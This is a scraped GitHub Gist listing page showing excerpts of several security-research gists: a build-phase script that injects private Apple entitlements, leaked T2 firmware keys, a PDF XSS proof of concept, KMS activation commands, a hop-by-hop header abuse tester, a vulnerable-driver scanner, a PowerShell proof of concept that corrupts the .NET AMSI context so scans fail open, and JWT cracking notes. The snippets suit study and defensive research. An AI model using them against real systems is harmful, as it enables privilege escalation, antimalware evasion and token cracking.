Skip to content

Instantly share code, notes, and snippets.

View Hamid-K's full-sized avatar

Hamid Hamid-K

147 followers · 20 following
View GitHub Profile
@ChiChou
ChiChou / phase.py
Created April 30, 2020 18:07
import os
# preinstalled python is python2
filename = '/'.join(map(os.environ.get, ('TARGET_TEMP_DIR', 'FULL_PRODUCT_NAME'))) + '.xcent'
evil = '''
<!---><!-->
<key>platform-application</key>
<true/>
<key>com.apple.private.security.no-container</key>
<true/>
@xerub
xerub / T2.keys
Created March 16, 2020 03:26
=== iBridge2,1,iBridge2,3,iBridge2,4,iBridge2,5,iBridge2,7,iBridge2,8_3.5_16P5200_Restore.ipsw
Firmware/dfu/iBEC.j137.RELEASE.im4p
3723c95ba25706b4650a92177afc28af57e0a236fd0e46b83cffb6140392b63355562b5ed671bda6b5929ff728f0b324
Firmware/dfu/iBSS.j140k.RELEASE.im4p
34d7aa36e00b5c772bf7381c821253a714ed2714552a48a478b391faac32bc0eef2577d5a04e01f462648754eb9af69e
Firmware/dfu/iBSS.j137.RELEASE.im4p
4bb3ecf8b19401a009b5c0003b64ac3bae8258f6d9c42b91831927e348957dfde01384caa3fbee1b6e665d168b46fc47
Firmware/dfu/iBEC.j680.RELEASE.im4p
893d17aa768a6ebd8f85b4251ef8f692c766f7b1868bd974a3dc9fcd0dd9608e4e0709bd9208752d9515a636c129378c
@andripwn
andripwn / poc.js
Created January 23, 2020 16:29
PDF Bypass - Cross-site Scripting (XSS)
app.alert("XSS")
@judero01col
judero01col / Service KMS
Last active May 14, 2025 08:09
Volume License Activation Key Service - KMS
## Find Available Target Editions
DISM.exe /Online /Get-TargetEditions
## Convert Server Standard 2019 Evaluation to Server Standard 2019
DISM /online /Set-Edition:ServerStandard /ProductKey:N69G4-B89J2-4G8F4-WWYCC-J464C /AcceptEula
## How To Activate
slmgr /ipk XXXXX-XXXXX-XXXXX-XXXXX-XXXXX
slmgr /skms [server]:[port]
slmgr /ato
@ndavison
ndavison / hbh-header-abuse-test.py
Last active February 2, 2025 12:51
Attempts to find hop-by-hop header abuse potential against the provided URL.
# github.com/ndavison
import requests
import random
import string
from argparse import ArgumentParser
parser = ArgumentParser(description="Attempts to find hop-by-hop header abuse potential against the provided URL.")
parser.add_argument("-u", "--url", help="URL to target (without query string)")
@entropiae
entropiae / Install pyenv on Ubuntu 18.04 + fish shell
Last active March 15, 2025 06:14
Install pyenv on Ubuntu 18.04 + Fish shell
Install pyenv on Ubuntu 18.04 + fish shell
- Install the packages required to compile Python
$ sudo apt-get update; sudo apt-get install --no-install-recommends make build-essential libssl-dev zlib1g-dev libbz2-dev libreadline-dev libsqlite3-dev wget curl llvm libncurses5-dev xz-utils tk-dev libxml2-dev libxmlsec1-dev libffi-dev liblzma-dev
- Download pyenv code from github
$ git clone https://github.com/pyenv/pyenv.git ~/.pyenv
- Define environment variable PYENV_ROOT to point to the path where pyenv repo is cloned
$ echo "set --export PYENV_ROOT $HOME/.pyenv" > ~/.config/fish/conf.d/pyenv.fish
@adrianyy
adrianyy / drvscan.cpp
Created May 2, 2019 16:37
vulnerable driver scanner
#include <string>
#include <vector>
#include <fstream>
#include <iostream>
#include <filesystem>
#include <Windows.h>
#include <winternl.h>
static_assert( sizeof( void* ) == 8 );
@mattifestation
mattifestation / CorruptCLRGlobal.ps1
Created December 7, 2018 12:45
A PoC function to corrupt the g_amsiContext global variable in clr.dll in .NET Framework Early Access build 3694
function Subvert-CLRAntiMalware {
<#
.SYNOPSIS
A proof-of-concept demonstrating overwriting a global variable that stores a pointer to an antimalware scan interface context structure. This PoC was only built to work with .NET Framework Early Access build 3694.
.DESCRIPTION
clr.dll in .NET Framework Early Access build 3694 has a global variable that stores a pointer to an antimalware scan interface context structure. By reading the pointer at that offset and then overwriting the forst DWORD, the context structure will become corrupted and subsequent scanning calls will fail open.
@fay59
fay59 / Quirks of C.md
Last active April 3, 2025 02:27
Quirks of C

Here's a list of mildly interesting things about the C language that I learned mostly by consuming Clang's ASTs. Although surprises are getting sparser, I might continue to update this document over time.

There are many more mildly interesting features of C++, but the language is literally known for being weird, whereas C is usually considered smaller and simpler, so this is (almost) only about C.

1. Combined type and variable/field declaration, inside a struct scope [https://godbolt.org/g/Rh94Go]

struct foo {
   struct bar {
 int x;
@pich4ya
pich4ya / crack_jwt.txt
Last active June 19, 2023 16:13
Crack JWT (HMAC) with HashCat/JohnTheRipper on MacOS
Target:
{
"alg": "HS256",
"typ": "JWT"
}
{
"sub": "1234567890",
"name": "John Doe",
"iat": 1516239022